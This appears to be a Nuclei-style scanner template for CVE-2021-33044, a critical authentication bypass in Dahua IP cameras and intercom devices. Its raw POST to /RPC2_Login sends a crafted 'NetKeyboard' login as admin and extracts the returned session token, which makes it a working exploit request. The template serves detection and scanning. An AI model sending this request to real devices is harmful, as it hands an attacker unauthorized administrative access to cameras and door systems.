id: CVE-2021-33044 info: name: Dahua IPC/VTH/VTO devices Authentication Bypass author: gy741 severity: critical description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. reference: - https://github.com/dorkerdevil/CVE-2021-33044 - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://seclists.org/fulldisclosure/2021/Oct/13 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-33044 cwe-id: CWE-287 tags: dahua,cve,cve2021,auth-bypass requests: - raw: - | POST /RPC2_Login HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Connection: close X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://{{Hostname}}/ Referer: http://{{Hostname}}/ {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - "\"result\":true" - "id" - "params" - "session" condition: and extractors: - type: regex group: 1 part: body regex: - ',"result":true,"session":"([a-z]+)"\}'